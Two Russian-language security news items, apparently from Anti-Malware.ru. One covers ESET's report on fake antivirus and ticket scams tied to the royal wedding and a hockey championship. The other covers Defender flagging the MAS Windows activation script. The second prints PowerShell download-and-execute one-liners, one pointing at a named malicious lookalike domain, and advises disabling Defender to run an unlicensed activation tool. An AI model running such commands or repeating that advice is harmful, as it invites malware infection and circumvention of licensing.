Киберпреступники наживаются на Королевской свадьбе и Чемпионате мира по хоккею в Словакии

Киберпреступники наживаются на Королевской свадьбе и Чемпионате мира по хоккею в Словакии

Компания ESET, сообщает о том, что киберпреступники активно используют свадьбу британского принца Уильяма Уэльского и предстоящий Чемпионат мира по хоккею в Словакии для распространения вредоносного программного обеспечения.  Злоумышленники часто используют громкие информационные поводы для повышения эффективности распространения злонамеренных программ и увеличения своей прибыли. Так, Королевская свадьба вызвала повышенный интерес у граждан всего мира, что подтверждает высокий рейтинг в поисковиках таких слов как «свадьба принца», «Уильям», «Миддлтон» и другие. Ажиотаж в сети вокруг светского мероприятия мошенники использовали в своих корыстных целях.



Специалисты лаборатории ESET зарегистрировали ложные веб-страницы на разных языках, оформленные под новостные сайты, которые распространяют фальшивые антивирусы - Win32/Adware.XPAntiSpyware.AB, по классификации ESET. При этом, используя методы «черной» SEO-оптимизации для своих ресурсов, киберпреступники добились топовых позиций этих вредоносных сайтов в результатах поиска, тем самым привлекли большую аудиторию. При переходе на такой вредоносный сайт, пользователь, как правило, наблюдает всплывающие окна, содержащие предупреждения о том, что его ПК заражен. Впоследствии ему предлагается скачать фальшивый антивирус, содержащий опасный функционал.

Кроме того, за последний месяц увеличились случаи мошенничества при продаже билетов через сеть Интернет на Чемпионат мира по хоккею, который пройдет в Словакии. По мере приближения чемпионата болельщики хоккея все чаще рискуют финансами, воспользовавшись услугами сомнительных сайтов ради моментального приобретения билетов. В результате, они не только не получают билетов, но и их финансовые данные попадают в базы злоумышленников.

«Использование громких информационных поводов для распространения вредоносных программ – метод далеко не новый, но по-прежнему эффективный, Причем, чаще всего, таким образом распространяются именно фальшивые антивирусы, – комментирует Александр Матросов, директор Центра вирусных исследований и аналитики компании ESET. – Киберпреступники идут на различные ухищрения, чтобы запугать пользователя и спровоцировать установку вредоносной программы. Цели у злоумышленников, как правило, многогранны: это и получение денег за «спасение» компьютера от мнимого злонамеренного ПО, и хищение персональных данных пользователя».

Компания ESET рекомендует приобретать билеты на мероприятия в сети только через официальные и зарегистрированные ресурсы. Если говорить о фальшивых антивирусах, то необходимо использовать только лицензионные антивирусные решения с актуальными обновлениями баз данных сигнатур.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru